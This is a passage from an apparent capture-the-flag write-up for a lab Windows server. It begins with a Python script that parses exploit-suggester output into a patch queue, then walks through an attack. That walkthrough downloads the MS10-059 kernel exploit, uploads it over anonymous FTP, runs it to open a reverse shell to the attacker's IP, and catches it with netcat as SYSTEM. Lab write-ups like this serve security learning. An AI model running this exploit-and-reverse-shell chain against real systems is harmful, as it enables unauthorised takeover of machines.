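[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done
"""

# "[E] exploitdb PoC, [M] Metasploit module" per the report's own legend.
EXPLOIT_SOURCE = {"E": "exploit-db PoC", "M": "Metasploit module"}
SEVERITY_RANK = {"Critical": 0, "Important": 1}

BULLETIN = re.compile(
    r"^\[(?P<tag>[EM])\] (?P<id>MS\d{2}-\d{3}): (?P<title>.+) "
    r"\((?P<kb>\d+)\) - (?P<severity>\w+)$"
)
HOTFIXES = re.compile(r"comparing the (\d+) hotfix\(es\)")


def installed_hotfixes(report):
    """Number of hotfixes the tool found in systeminfo, or None if absent."""
    m = HOTFIXES.search(report)
    return int(m.group(1)) if m else None


def impact_of(title):
    """Coarse impact class taken from the bulletin title (illustrative)."""
    if "Elevation of Privilege" in title:
        return "EoP"
    if "Remote Code Execution" in title:
        return "RCE"
    return "other"


def parse_bulletins(report):
    """Turn [E]/[M] result lines into dicts; [*] and [+] lines are skipped."""
    found = []
    for line in report.splitlines():
        m = BULLETIN.match(line.strip())
        if m:
            found.append({
                "id": m["id"],
                "kb": m["kb"],
                "severity": m["severity"],
                "impact": impact_of(m["title"]),
                "exploit": EXPLOIT_SOURCE[m["tag"]],
            })
    return found


def patch_queue(bulletins, impact=None):
    """Bulletins ordered by severity, then ID; optionally one impact class."""
    rows = [b for b in bulletins if impact is None or b["impact"] == impact]
    rows.sort(key=lambda b: (SEVERITY_RANK.get(b["severity"], 9), b["id"]))
    return [(b["id"], "KB" + b["kb"], b["exploit"]) for b in rows]


if __name__ == "__main__":
    print("hotfixes installed:", installed_hotfixes(SAMPLE))
    for row in patch_queue(parse_bulletins(SAMPLE), impact="EoP"):
        print(*row, sep="  ")
```

A hotfix count of 0 on a host this old means it has never been patched, so every bulletin in the queue applies.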
Working Exploit
MS10-059 worked and I got the binary from https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe.
On Kalibox
ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: <password>
230 User logged in.
Remote system type is Windows_NT.
ftp> put MS10-059.exe
Devel Machine
c:\inetpub\wwwroot>MS10-059.exe
MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
c:\inetpub\wwwroot>MS10-059.exe YOUR-IP 4444
MS10-059.exe YOUR-IP 4444
On Kalibox
# nc -lvnp 4444
listening on [any] 4444 ...
connect to [YOUR-IP] from (UNKNOWN) [10.10.10.5] 49160
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\inetpub\wwwroot>whoami
whoami
nt authority\system